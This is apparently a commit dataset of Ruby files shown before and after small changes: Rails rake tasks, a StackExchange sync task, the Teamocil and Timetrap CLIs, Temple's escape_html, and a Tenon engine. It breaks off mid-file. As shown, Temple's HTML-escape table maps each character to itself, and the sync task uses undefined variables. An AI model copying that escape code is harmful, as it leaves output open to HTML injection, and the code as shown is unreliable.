{ :name => "Speed Biking", :time => 60 },
{ :name => "Indoor Cycling" },
{ :name => "Indoor Rowing" },
{ :name => "Swim" },
{ :name => "Pool Running" },
{ :name => "Ecliptical Machine Training" },
{ :name => "Hands-Up Lunge" },
{ :name => "Plank Flip" },
{ :name => "Single-Leg Squat" },
{ :name => "Swim workout" },
{ :name => "Core workout 1" },
{ :name => "Core Workout 2" },
{ :name => "16x400m" },
{ :name => "10x800" },
{ :name => "Overhead Lunge" },
{ :name => "Mixed-Grip Chinup" },
{ :name => "Scorpion" },
{ :name => "Sprints" }
]
end
desc 'Seed Users'
task :users => :environment do
users = [
{ :name => "Jacob", :gender => "male", :longest_distance => 3.1, :mile_time => 540_000 },
{ :name => "Sophia", :gender => "female", :longest_distance => 3.1, :mile_time => 570_000 },
{ :name => "Mason", :gender => "male", :longest_distance => 5.2, :mile_time => 360_000 },
{ :name => "Emma", :gender => "female", :longest_distance => 5.2, :mile_time => 390_000 },
{ :name => "Ethan", :gender => "male", :longest_distance => 13.1, :mile_time => 430_000 },
{ :name => "Isabella", :gender => "female", :longest_distance => 13.1, :mile_time => 470_000 },
{ :name => "Noah", :gender => "male", :longest_distance => 26.2, :mile_time => 500_000 },
{ :name => "Olivia", :gender => "female", :longest_distance => 26.2, :mile_time => 510_000 },
{ :name => "William", :gender => "male", :longest_distance => 50, :mile_time => 600_000 },
{ :name => "Ava", :gender => "female", :longest_distance => 50, :mile_time => 640_000 },
{ :name => "Liam", :gender => "male", :longest_distance => 1, :mile_time => 720_000 },
{ :name => "Emily", :gender => "female", :longest_distance => 1, :mile_time => 760_000 },
{ :name => "Jayden", :gender => "male", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Abigail", :gender => "female", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Michael", :gender => "male", :longest_distance => 3.9, :mile_time => 460_000 },
{ :name => "Mia", :gender => "female", :longest_distance => 4.3, :mile_time => 490_000 },
{ :name => "Alexander", :gender => "male", :longest_distance => 5.3, :mile_time => 430_000 },
{ :name => "Madison", :gender => "female", :longest_distance => 4.8, :mile_time => 450_000 },
{ :name => "Aiden", :gender => "male", :longest_distance => 18.8, :mile_time => 400_000 },
{ :name => "Elizabeth", :gender => "female", :longest_distance => 16.4, :mile_time => 415_000 }
]
users.each do |user|
User.create user
end
end
end
|
require 'httparty'
namespace :sync do
task feeds: [:environment] do
philosophy_questions = grab_questions("artificial-intelligence","philosophy")
save_questions(philosophy_questions, Feed.where(name: "Philosophy"))
world_building_questions = grab_questions("artificial-intelligence", "worldbuilding")
save_questions(world_building_questions, Feed.where(name: "Worldbuilding"))
computer_science_questions = grab_questions("artificial-intelligence","cs")
save_questions(computer_science_questions, Feed.where(name: "Computer Science"))
theory_machine_learning_questions = grab_questions("machine-learning","stats")
save_questions(theory_machine_learning_questions, Feed.where(name: "Cross Validated"))
computional_linguistics_questions = grab_questions("computational-linguistics","linguistics")
save_questions(computional_linguistics_questions, Feed.where(name: "Computional Linguistics"))
machine_learning_questions = grab_questions("machine-learning","datascience")
save_questions(machine_learning_questions, Feed.where(name: "Data Science"))
end
def grab_questions(tag, sitename)
HTTParty.get("https://api.stackexchange.com/2.2/questions?page=#{page}&order=desc&sort=activity&tagged=#{tag}&site=#{site}")["items"]
end
def save_questions(entries, feed)
entries.each do |entry|
title = entry["title"]
content = nil
author = entry["owner"]["display_name"]
author_profile = entry["owner"]["link"]
url = entry["link"]
published = Time.at(entry["creation_date"]).to_datetime
local_entry = feed.entries.where(title: title).first_or_initialize
local_entry.update_attributes(content: content, author: author, url: url, published: published, author_profile: author_profile)
p "Synced Entry - #{title}"
end
p "Synced Feed - #{feed.name}"
end
end
Indicate what page to gain info on
require 'httparty'
namespace :sync do
task feeds: [:environment] do
philosophy_questions = grab_questions("artificial-intelligence","philosophy")
save_questions(philosophy_questions, Feed.where(name: "Philosophy"))
world_building_questions = grab_questions("artificial-intelligence", "worldbuilding")
save_questions(world_building_questions, Feed.where(name: "Worldbuilding"))
computer_science_questions = grab_questions("artificial-intelligence","cs")
save_questions(computer_science_questions, Feed.where(name: "Computer Science"))
theory_machine_learning_questions = grab_questions("machine-learning","stats")
save_questions(theory_machine_learning_questions, Feed.where(name: "Cross Validated"))
computional_linguistics_questions = grab_questions("computational-linguistics","linguistics")
save_questions(computional_linguistics_questions, Feed.where(name: "Computional Linguistics"))
machine_learning_questions = grab_questions("machine-learning","datascience")
save_questions(machine_learning_questions, Feed.where(name: "Data Science"))
end
def grab_questions(tag, sitename)
HTTParty.get("https://api.stackexchange.com/2.2/questions?page=1&order=desc&sort=activity&tagged=#{tag}&site=#{site}")["items"]
end
def save_questions(entries, feed)
entries.each do |entry|
title = entry["title"]
content = nil
author = entry["owner"]["display_name"]
author_profile = entry["owner"]["link"]
url = entry["link"]
published = Time.at(entry["creation_date"]).to_datetime
local_entry = feed.entries.where(title: title).first_or_initialize
local_entry.update_attributes(content: content, author: author, url: url, published: published, author_profile: author_profile)
p "Synced Entry - #{title}"
end
p "Synced Feed - #{feed.name}"
end
end |
namespace :temp do
desc 'Update campaign slugs that end in a trailing hyphen'
task :update_trailing_hyphen_slugs => :environment do
Campaign.visible.each do |campaign|
if campaign.to_param.last == '-'
campaign.save
end
end
end
end
Temp task for franchise transfer.
namespace :temp do
desc 'Update campaign slugs that end in a trailing hyphen'
task :update_trailing_hyphen_slugs => :environment do
Campaign.visible.each do |campaign|
if campaign.to_param.last == '-'
campaign.save
end
end
end
desc 'Transfer NXEA routes to Greater Anglia'
task :transfer_nxea_routes_to_greater_anglia => :environment do
operator = Operator.find_by_name('National Express East Anglia')
new_operator = Operator.find_by_name('Greater Anglia')
raise "Couldn't find NXEA" unless operator
operator.route_operators.each do |route_operator|
route = route_operator.route
StopAreaOperator.create!(:operator => new_operator, :route => route)
puts route_operator.id
route_operator.destroy
end
operator.stop_area_operators.each do |stop_area_operator|
stop_area = stop_area_operator.stop_area
StopAreaOperator.create!(:operator => new_operator, :stop_area => stop_area)
puts stop_area_operator.id
stop_area_operator.destroy
end
end
end
|
require 'optparse'
require 'fileutils'
module Teamocil
# This class handles interaction with the `tmux` utility.
class CLI
attr_accessor :layout, :layouts
# Initialize a new run of `tmux`
#
# @param argv [Hash] the command line parameters hash (usually `ARGV`).
# @param env [Hash] the environment variables hash (usually `ENV`).
def initialize(argv, env) # {{{
parse_options! argv
layout_path = File.join("#{env["HOME"]}", ".teamocil")
if @options.include?(:list)
@layouts = get_layouts(layout_path)
return print_layouts
end
if @options.include?(:layout)
file = @options[:layout]
else
file = ::File.join(layout_path, "#{argv[0]}.yml")
end
if @options[:edit]
::FileUtils.touch file unless File.exists?(file)
Kernel.system("$EDITOR \"#{file}\"")
else
bail "There is no file \"#{file}\"" unless File.exists?(file)
bail "You must be in a tmux session to use teamocil" unless env["TMUX"]
parsed_layout = YAML.load_file(file)
@layout = Teamocil::Layout.new(parsed_layout, @options)
@layout.compile!
@layout.execute_commands(@layout.generate_commands)
end
end # }}}
# Parse the command line options
def parse_options!(args) # {{{
@options = {}
opts = ::OptionParser.new do |opts|
opts.banner = "Usage: teamocil [options] <layout>
Options:
"
opts.on("--here", "Set up the first window in the current window") do
@options[:here] = true
end
opts.on("--edit", "Edit the YAML layout file instead of using it") do
@options[:edit] = true
end
opts.on("--layout [LAYOUT]", "Use a specific layout file, instead of `~/.teamocil/<layout>.yml`") do |layout|
@options[:layout] = layout
end
opts.on("--list", "List all available layouts in `~/.teamocil/`") do
@options[:list] = true
end
end
opts.parse! args
end # }}}
# Return an array of available layouts
#
# @param path [String] the path used to look for layouts
def get_layouts(path) # {{{
Dir.glob(File.join(path, "*.yml")).map { |file| File.basename(file).gsub(/\..+$/, "") }.sort
end # }}}
# Print each layout on a single line
def print_layouts # {{{
STDOUT.puts @layouts.join("\n")
exit 0
end # }}}
# Print an error message and exit the utility
#
# @param msg [Mixed] something to print before exiting.
def bail(msg) # {{{
STDERR.puts "[teamocil] #{msg}"
exit 1
end # }}}
end
end
Clean some code in CLI class
require 'optparse'
require 'fileutils'
module Teamocil
# This class handles interaction with the `tmux` utility.
class CLI
attr_accessor :layout, :layouts
# Initialize a new run of `tmux`
#
# @param argv [Hash] the command line parameters hash (usually `ARGV`).
# @param env [Hash] the environment variables hash (usually `ENV`).
def initialize(argv, env) # {{{
parse_options! argv
layout_path = File.join("#{env["HOME"]}", ".teamocil")
if @options.include?(:list)
@layouts = get_layouts(layout_path)
return print_layouts
end
file = @options[:layout] || ::File.join(layout_path, "#{argv[0]}.yml")
if @options[:edit]
::FileUtils.touch file unless File.exists?(file)
Kernel.system("$EDITOR \"#{file}\"")
else
bail "There is no file \"#{file}\"" unless File.exists?(file)
bail "You must be in a tmux session to use teamocil" unless env["TMUX"]
@layout = Teamocil::Layout.new(YAML.load_file(file), @options)
@layout.compile!
@layout.execute_commands(@layout.generate_commands)
end
end # }}}
# Parse the command line options
def parse_options!(args) # {{{
@options = {}
opts = ::OptionParser.new do |opts|
opts.banner = "Usage: teamocil [options] <layout>
Options:
"
opts.on("--here", "Set up the first window in the current window") do
@options[:here] = true
end
opts.on("--edit", "Edit the YAML layout file instead of using it") do
@options[:edit] = true
end
opts.on("--layout [LAYOUT]", "Use a specific layout file, instead of `~/.teamocil/<layout>.yml`") do |layout|
@options[:layout] = layout
end
opts.on("--list", "List all available layouts in `~/.teamocil/`") do
@options[:list] = true
end
end
opts.parse! args
end # }}}
# Return an array of available layouts
#
# @param path [String] the path used to look for layouts
def get_layouts(path) # {{{
Dir.glob(File.join(path, "*.yml")).map { |file| File.basename(file).gsub(/\..+$/, "") }.sort
end # }}}
# Print each layout on a single line
def print_layouts # {{{
STDOUT.puts @layouts.join("\n")
exit 0
end # }}}
# Print an error message and exit the utility
#
# @param msg [Mixed] something to print before exiting.
def bail(msg) # {{{
STDERR.puts "[teamocil] #{msg}"
exit 1
end # }}}
end
end
|
module Temple
# @api public
module Utils
extend self
# Returns an escaped copy of `html`.
# Strings which are declared as html_safe are not escaped.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html_safe(html)
html.html_safe? ? html : escape_html(html)
end
if defined?(EscapeUtils)
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
EscapeUtils.escape_html(html.to_s)
end
elsif RUBY_VERSION > '1.9'
# Used by escape_html
# @api private
ESCAPE_HTML = {
'&' => '&',
'"' => '"',
'<' => '<',
'>' => '>',
'/' => '/',
}.freeze
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
html.to_s.gsub(/[&\"<>\/]/, ESCAPE_HTML)
end
else
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
html.to_s.gsub(/&/n, '&').gsub(/\"/n, '"').gsub(/>/n, '>').gsub(/</n, '<').gsub(/\//, '/')
end
end
# Generate unique variable name
#
# @param prefix [String] Variable name prefix
# @return [String] Variable name
def unique_name(prefix = nil)
@unique_name ||= 0
prefix ||= (@unique_prefix ||= self.class.name.gsub('::', '_').downcase)
"_#{prefix}#{@unique_name += 1}"
end
def contains_static?(exp)
case exp[0]
when :multi
exp[1..-1].any? {|e| contains_static?(e) }
when :escape
contains_static?(exp[2])
when :static
true
else
false
end
end
# Check if expression is empty
#
# @param exp [Array] Temple expression
# @return true if expression is empty
def empty_exp?(exp)
case exp[0]
when :multi
exp[1..-1].all? {|e| empty_exp?(e) }
when :newline
true
else
false
end
end
end
end
Temple::Utils do not escape / in escape_html
module Temple
# @api public
module Utils
extend self
# Returns an escaped copy of `html`.
# Strings which are declared as html_safe are not escaped.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html_safe(html)
html.html_safe? ? html : escape_html(html)
end
if defined?(EscapeUtils)
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
EscapeUtils.escape_html(html.to_s, false)
end
elsif RUBY_VERSION > '1.9'
# Used by escape_html
# @api private
ESCAPE_HTML = {
'&' => '&',
'"' => '"',
'<' => '<',
'>' => '>',
}.freeze
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
html.to_s.gsub(/[&\"<>]/, ESCAPE_HTML)
end
else
# Returns an escaped copy of `html`.
#
# @param html [String] The string to escape
# @return [String] The escaped string
def escape_html(html)
html.to_s.gsub(/&/n, '&').gsub(/\"/n, '"').gsub(/>/n, '>').gsub(/</n, '<')
end
end
# Generate unique variable name
#
# @param prefix [String] Variable name prefix
# @return [String] Variable name
def unique_name(prefix = nil)
@unique_name ||= 0
prefix ||= (@unique_prefix ||= self.class.name.gsub('::', '_').downcase)
"_#{prefix}#{@unique_name += 1}"
end
def contains_static?(exp)
case exp[0]
when :multi
exp[1..-1].any? {|e| contains_static?(e) }
when :escape
contains_static?(exp[2])
when :static
true
else
false
end
end
# Check if expression is empty
#
# @param exp [Array] Temple expression
# @return true if expression is empty
def empty_exp?(exp)
case exp[0]
when :multi
exp[1..-1].all? {|e| empty_exp?(e) }
when :newline
true
else
false
end
end
end
end
|
require 'browserify-rails'
require 'cancan'
require 'cocoon'
require 'coffee-rails'
require 'date_time_attribute'
require 'draper'
require 'dynamic_form'
require 'eco'
require 'font-awesome-rails'
require 'haml'
require 'jbuilder'
require 'jquery-fileupload-rails'
require 'jquery-rails'
require 'jquery-ui-rails'
require 'lodash-rails'
require 'mediaelement_rails'
require 'mime-types'
require 'neat'
require 'non-stupid-digest-assets'
require 'normalize-rails'
require 'paperclip'
require 'paperclip_processors/cropper'
require 'pickadate-rails'
require 'rails-settings-cached'
require 'react-rails'
require 'sass-rails'
require 'sprockets/es6'
require 'uuidtools'
require 'will_paginate'
module Tenon
class Engine < ::Rails::Engine
isolate_namespace Tenon
config.app_generators do |g|
g.templates.unshift File.expand_path('../../templates', __FILE__)
end
config.to_prepare do
ApplicationController.helper(Tenon::TenonHelper)
ApplicationController.helper(Tenon::BreadcrumbsHelper)
end
initializer :assets do |config|
Rails.application.config.assets.precompile += ['tenon/tenon_manifest.js', 'tenon/tenon.scss', 'tenon/*.png']
Rails.application.config.browserify_rails.commandline_options = '-t babelify'
Rails.application.config.browserify_rails.paths << lambda { |p| p.start_with?(Engine.root.join("app").to_s) }
Rails.application.config.browserify_rails.use_browserifyinc = true
end
end
end
working on cleaning up gems and getting it running on the demo server
require 'browserify-rails'
require 'cancan'
require 'cocoon'
require 'coffee-rails'
require 'date_time_attribute'
require 'draper'
require 'dynamic_form'
require 'eco'
require 'font-awesome-rails'
require 'haml'
require 'jbuilder'
require 'jquery-fileupload-rails'
require 'jquery-rails'
require 'jquery-ui-rails'
require 'lodash-rails'
require 'mediaelement_rails'
require 'mime-types'
require 'neat'
require 'non-stupid-digest-assets'
require 'normalize-rails'
require 'paperclip'
require 'paperclip_processors/cropper'
require 'pickadate-rails'
require 'rails-settings-cached'
require 'react-rails'
require 'sass-rails'
require 'sprockets/es6'
require 'uuidtools'
require 'will_paginate'
# Dummy app gems
require 'humanizer'
module Tenon
class Engine < ::Rails::Engine
isolate_namespace Tenon
config.app_generators do |g|
g.templates.unshift File.expand_path('../../templates', __FILE__)
end
config.to_prepare do
ApplicationController.helper(Tenon::TenonHelper)
ApplicationController.helper(Tenon::BreadcrumbsHelper)
end
initializer :assets do |config|
Rails.application.config.assets.precompile += ['tenon/tenon_manifest.js', 'tenon/tenon.scss', 'tenon/*.png']
Rails.application.config.browserify_rails.commandline_options = '-t babelify'
Rails.application.config.browserify_rails.paths << lambda { |p| p.start_with?(Engine.root.join("app").to_s) }
Rails.application.config.browserify_rails.use_browserifyinc = true
end
end
end
|
module Timetrap
module CLI
extend Helpers
attr_accessor :args
extend self
USAGE = <<-EOF
Timetrap - Simple Time Tracking
Usage: #{File.basename $0} COMMAND [OPTIONS] [ARGS...]
COMMAND can be abbreviated. For example `t in` and `t i` are equivalent.
COMMAND is one of:
* archive - Move entries to a hidden sheet (by default named '_[SHEET]') so
they're out of the way.
usage: t archive [--start DATE] [--end DATE] [SHEET]
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
* backend - Open an sqlite shell to the database.
usage: t backend
* configure - Write out a YAML config file. Print path to config file. The
file may contain ERB.
usage: t configure
Currently supported options are:
round_in_seconds: The duration of time to use for rounding with
the -r flag
database_file: The file path of the sqlite database
append_notes_delimiter: delimiter used when appending notes via
t edit --append
formatter_search_paths: an array of directories to search for user
defined fomatter classes
default_formatter: The format to use when display is invoked without a
`--format` option
default_command: The default command to run when calling t.
auto_checkout: Automatically check out of running entries when
you check in or out
require_note: Prompt for a note if one isn't provided when
checking in
* display - Display the current timesheet or a specific. Pass `all' as SHEET
to display all unarchived sheets or `full' to display archived and
unarchived sheets.
usage: t display [--ids] [--start DATE] [--end DATE] [--format FMT] [SHEET | all | full]
-v, --ids Print database ids (for use with edit)
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
-f, --format <format> The output format. Valid built-in formats are
ical, csv, json, ids, factor, and text (default).
Documentation on defining custom formats can be
found in the README included in this
distribution.
* edit - Alter an entry's note, start, or end time. Defaults to the active
entry. Defaults to the last entry to be checked out of if no entry is active.
usage: t edit [--id ID] [--start TIME] [--end TIME] [--append] [NOTES]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
-s, --start <time:qs> Change the start time to <time>
-e, --end <time:qs> Change the end time to <time>
-z, --append Append to the current note instead of replacing it
the delimiter between appended notes is
configurable (see configure)
-m, --move <sheet> Move to another sheet
* in - Start the timer for the current timesheet.
usage: t in [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* kill - Delete a timesheet or an entry.
usage: t kill [--id ID] [TIMESHEET]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
* list - Show the available timesheets.
usage: t list
* now - Show all running entries.
usage: t now
* out - Stop the timer for a timesheet.
usage: t out [--at TIME] [TIMESHEET]
-a, --at <time:qs> Use this time instead of now
* resume - Start the timer for the current time sheet with the same note as
the last entry on the sheet. If there is no entry it takes the passed note.
usage: t resume [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* sheet - Switch to a timesheet creating it if necessary. When no sheet is
specified list all sheets. The special sheetname '-' will switch to the
last active sheet.
usage: t sheet [TIMESHEET]
* today - Shortcut for display with start date as the current day
usage: t today [--ids] [--format FMT] [SHEET | all]
* yesterday - Shortcut for display with start and end dates as the day before the current day
usage: t yesterday [--ids] [--format FMT] [SHEET | all]
* week - Shortcut for display with start date set to monday of this week.
usage: t week [--ids] [--end DATE] [--format FMT] [SHEET | all]
* month - Shortcut for display with start date set to the beginning of either
this month or a specified month.
usage: t month [--ids] [--start MONTH] [--format FMT] [SHEET | all]
OTHER OPTIONS
-h, --help Display this help.
-r, --round Round output to 15 minute start and end times.
-y, --yes Noninteractive, assume yes as answer to all prompts.
--debug Display stack traces for errors.
EXAMPLES
# create the "MyTimesheet" timesheet
$ t sheet MyTimesheet
# check in 5 minutes ago with a note
$ t in --at '5 minutes ago' doing some stuff
# check out
$ t out
# view current timesheet
$ t display
Submit bugs and feature requests to http://github.com/samg/timetrap/issues
EOF
def parse arguments
args.parse arguments
end
def invoke
args['-h'] ? puts(USAGE) : invoke_command_if_valid
rescue StandardError, LoadError => e
raise e if args['--debug']
warn e.message
exit 1 unless defined? TEST_MODE
end
def commands
Timetrap::CLI::USAGE.scan(/\* \w+/).map{|s| s.gsub(/\* /, '')}
end
def deprecated_commands
{
'switch' => 'sheet',
'running' => 'now',
'format' => 'display'
}
end
def invoke_command_if_valid
if args.unused.empty? && Timetrap::Config['default_command']
self.args = Getopt::Declare.new(USAGE.dup, Timetrap::Config['default_command'])
end
command = args.unused.shift
set_global_options
case (valid = commands.select{|name| name =~ %r|^#{command}|}).size
when 1 then send valid[0]
else
handle_invalid_command(command)
end
end
def valid_command(command)
return commands.include?(command)
end
def handle_invalid_command(command)
if !command
puts USAGE
elsif mapping = deprecated_commands.detect{|(k,v)| k =~ %r|^#{command}|}
deprecated, current = *mapping
warn "The #{deprecated.inspect} command is deprecated in favor of #{current.inspect}. Sorry for the inconvenience."
send current
else
warn "Invalid command: #{command.inspect}"
end
end
# currently just sets whether output should be rounded to 15 min intervals
def set_global_options
Timetrap::Entry.round = true if args['-r']
end
def archive
ee = selected_entries
if ask_user "Archive #{ee.count} entries? "
ee.all.each do |e|
next unless e.end
e.update :sheet => "_#{e.sheet}"
end
else
warn "archive aborted!"
end
end
def configure
Config.configure!
puts "Config file is at #{Config::PATH.inspect}"
end
def edit
entry = case
when args['-i']
warn "Editing entry with id #{args['-i'].inspect}"
Entry[args['-i']]
when Timer.active_entry
warn "Editing running entry"
Timer.active_entry
when Timer.last_checkout
warn "Editing last entry you checked out of"
Timer.last_checkout
end
unless entry
warn "Can't find entry"
return
end
warn ""
entry.update :start => args['-s'] if args['-s'] =~ /.+/
entry.update :end => args['-e'] if args['-e'] =~ /.+/
# update sheet
if args['-m'] =~ /.+/
if entry == Timer.active_entry
Timer.current_sheet = args['-m']
end
entry.update :sheet => args['-m']
end
# update notes
if unused_args =~ /.+/
note = unused_args
if args['-z']
note = [entry.note, note].join(Config['append_notes_delimiter'])
end
entry.update :note => note
end
puts format_entries(entry)
end
def backend
exec "sqlite3 #{DB_NAME}"
end
def in
if Config['auto_checkout']
Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
end
if Config['require_note'] && !Timer.running? && unused_args.empty?
$stderr.print("Please enter a note for this entry:\n> ")
self.unused_args = $stdin.gets
end
Timer.start unused_args, args['-a']
warn "Checked into sheet #{Timer.current_sheet.inspect}."
end
def resume
last_entry = Timer.entries(Timer.current_sheet).last
last_entry ||= Timer.entries("_#{Timer.current_sheet}").last
warn "No entry yet on this sheet yet. Started a new entry." unless last_entry
note = (last_entry ? last_entry.note : nil)
warn "Resuming #{note.inspect} from entry ##{last_entry.id}" if note
self.unused_args = note || unused_args
self.in
end
def out
if Config['auto_checkout']
stopped = Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
if stopped.empty?
warn "No running entries to stop."
end
else
sheet = sheet_name_from_string(unused_args)
if Timer.stop sheet, args['-a']
warn "Checked out of sheet #{sheet.inspect}."
else
warn "No running entry on sheet #{sheet.inspect}."
end
end
end
def kill
if e = Entry[args['-i']]
out = "are you sure you want to delete entry #{e.id}? "
out << "(#{e.note}) " if e.note.to_s =~ /.+/
if ask_user out
e.destroy
warn "it's dead"
else
warn "will not kill"
end
elsif (sheets = Entry.map{|e| e.sheet }.uniq).include?(sheet = unused_args)
victims = Entry.filter(:sheet => sheet).count
if ask_user "are you sure you want to delete #{victims} entries on sheet #{sheet.inspect}? "
Entry.filter(:sheet => sheet).destroy
warn "killed #{victims} entries"
else
warn "will not kill"
end
else
victim = args['-i'] ? args['-i'].to_s.inspect : sheet.inspect
warn ["can't find #{victim} to kill", 'sheets:', *sheets].join("\n")
end
end
def display
entries = selected_entries.order(:start).all
if entries == []
warn "No entries were selected to display."
else
puts format_entries(entries)
end
end
def sheet
sheet = unused_args
case sheet
when nil, ''
list
return
when '-'
if Timer.last_sheet
sheet = Timer.last_sheet
else
warn 'LAST_SHEET is not set'
return
end
end
Timer.current_sheet = sheet
warn "Switching to sheet #{sheet.inspect}"
end
def list
sheets = ([Timer.current_sheet] | Entry.sheets).map do |sheet|
sheet_atts = {:total => 0, :running => 0, :today => 0}
entries = Timetrap::Entry.filter(:sheet => sheet)
if entries.empty?
sheet_atts.merge(:name => sheet)
else
entries.inject(sheet_atts) do |m, e|
e_end = e.end_or_now
m[:name] ||= sheet
m[:total] += (e_end.to_i - e.start.to_i)
m[:running] += (e_end.to_i - e.start.to_i) unless e.end
m[:today] += (e_end.to_i - e.start.to_i) if same_day?(Time.now, e.start)
m
end
end
end.sort_by{|sheet| sheet[:name].downcase}
width = sheets.sort_by{|h|h[:name].length }.last[:name].length + 4
width = 10 if width < 10
puts " %-#{width}s%-12s%-12s%s" % ["Timesheet", "Running", "Today", "Total Time"]
sheets.each do |sheet|
star = sheet[:name] == Timer.current_sheet ? '*' : sheet[:name] == Timer.last_sheet ? '-' : ' '
puts "#{star}%-#{width}s%-12s%-12s%s" % [
sheet[:running],
sheet[:today],
sheet[:total]
].map(&method(:format_seconds)).unshift(sheet[:name])
end
end
def now
if !Timer.running?
warn "*#{Timer.current_sheet}: not running"
end
Timer.running_entries.each do |entry|
current = entry.sheet == Timer.current_sheet
out = current ? '*' : ' '
out << "#{entry.sheet}: #{format_duration(entry.duration)}".gsub(/ /, ' ')
out << " (#{entry.note})" if entry.note =~ /.+/
puts out
end
end
def today
args['-s'] = Date.today.to_s
display
end
def yesterday
args['-s'] = Date.today.prev_day.to_s
args['-e'] = Date.today.prev_day.to_s
display
end
def week
args['-s'] = Date.today.wday == 1 ? Date.today.to_s : Date.parse(Chronic.parse(%q(last monday)).to_s).to_s
display
end
def month
d = Chronic.parse( args['-s'] || Date.today )
beginning_of_month = Date.new( d.year, d.month )
end_of_month = if d.month == 12 # handle edgecase
Date.new( d.year + 1, 1) - 1
else
Date.new( d.year, d.month+1 ) - 1
end
args['-s'] = beginning_of_month.to_s
args['-e'] = end_of_month.to_s
display
end
private
def unused_args
args.unused.join(' ')
end
def unused_args=(str)
args.unused = str.split
end
def ask_user question
return true if args['-y']
$stderr.print question
$stdin.gets =~ /\Aye?s?\Z/i
end
def format_entries(entries)
load_formatter(args['-f'] || Config['default_formatter']).new(Array(entries)).output
end
end
end
Ruby 1.8 compatibility for yesterday command
module Timetrap
module CLI
extend Helpers
attr_accessor :args
extend self
USAGE = <<-EOF
Timetrap - Simple Time Tracking
Usage: #{File.basename $0} COMMAND [OPTIONS] [ARGS...]
COMMAND can be abbreviated. For example `t in` and `t i` are equivalent.
COMMAND is one of:
* archive - Move entries to a hidden sheet (by default named '_[SHEET]') so
they're out of the way.
usage: t archive [--start DATE] [--end DATE] [SHEET]
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
* backend - Open an sqlite shell to the database.
usage: t backend
* configure - Write out a YAML config file. Print path to config file. The
file may contain ERB.
usage: t configure
Currently supported options are:
round_in_seconds: The duration of time to use for rounding with
the -r flag
database_file: The file path of the sqlite database
append_notes_delimiter: delimiter used when appending notes via
t edit --append
formatter_search_paths: an array of directories to search for user
defined fomatter classes
default_formatter: The format to use when display is invoked without a
`--format` option
default_command: The default command to run when calling t.
auto_checkout: Automatically check out of running entries when
you check in or out
require_note: Prompt for a note if one isn't provided when
checking in
* display - Display the current timesheet or a specific. Pass `all' as SHEET
to display all unarchived sheets or `full' to display archived and
unarchived sheets.
usage: t display [--ids] [--start DATE] [--end DATE] [--format FMT] [SHEET | all | full]
-v, --ids Print database ids (for use with edit)
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
-f, --format <format> The output format. Valid built-in formats are
ical, csv, json, ids, factor, and text (default).
Documentation on defining custom formats can be
found in the README included in this
distribution.
* edit - Alter an entry's note, start, or end time. Defaults to the active
entry. Defaults to the last entry to be checked out of if no entry is active.
usage: t edit [--id ID] [--start TIME] [--end TIME] [--append] [NOTES]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
-s, --start <time:qs> Change the start time to <time>
-e, --end <time:qs> Change the end time to <time>
-z, --append Append to the current note instead of replacing it
the delimiter between appended notes is
configurable (see configure)
-m, --move <sheet> Move to another sheet
* in - Start the timer for the current timesheet.
usage: t in [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* kill - Delete a timesheet or an entry.
usage: t kill [--id ID] [TIMESHEET]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
* list - Show the available timesheets.
usage: t list
* now - Show all running entries.
usage: t now
* out - Stop the timer for a timesheet.
usage: t out [--at TIME] [TIMESHEET]
-a, --at <time:qs> Use this time instead of now
* resume - Start the timer for the current time sheet with the same note as
the last entry on the sheet. If there is no entry it takes the passed note.
usage: t resume [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* sheet - Switch to a timesheet creating it if necessary. When no sheet is
specified list all sheets. The special sheetname '-' will switch to the
last active sheet.
usage: t sheet [TIMESHEET]
* today - Shortcut for display with start date as the current day
usage: t today [--ids] [--format FMT] [SHEET | all]
* yesterday - Shortcut for display with start and end dates as the day before the current day
usage: t yesterday [--ids] [--format FMT] [SHEET | all]
* week - Shortcut for display with start date set to monday of this week.
usage: t week [--ids] [--end DATE] [--format FMT] [SHEET | all]
* month - Shortcut for display with start date set to the beginning of either
this month or a specified month.
usage: t month [--ids] [--start MONTH] [--format FMT] [SHEET | all]
OTHER OPTIONS
-h, --help Display this help.
-r, --round Round output to 15 minute start and end times.
-y, --yes Noninteractive, assume yes as answer to all prompts.
--debug Display stack traces for errors.
EXAMPLES
# create the "MyTimesheet" timesheet
$ t sheet MyTimesheet
# check in 5 minutes ago with a note
$ t in --at '5 minutes ago' doing some stuff
# check out
$ t out
# view current timesheet
$ t display
Submit bugs and feature requests to http://github.com/samg/timetrap/issues
EOF
def parse arguments
args.parse arguments
end
def invoke
args['-h'] ? puts(USAGE) : invoke_command_if_valid
rescue StandardError, LoadError => e
raise e if args['--debug']
warn e.message
exit 1 unless defined? TEST_MODE
end
def commands
Timetrap::CLI::USAGE.scan(/\* \w+/).map{|s| s.gsub(/\* /, '')}
end
def deprecated_commands
{
'switch' => 'sheet',
'running' => 'now',
'format' => 'display'
}
end
def invoke_command_if_valid
if args.unused.empty? && Timetrap::Config['default_command']
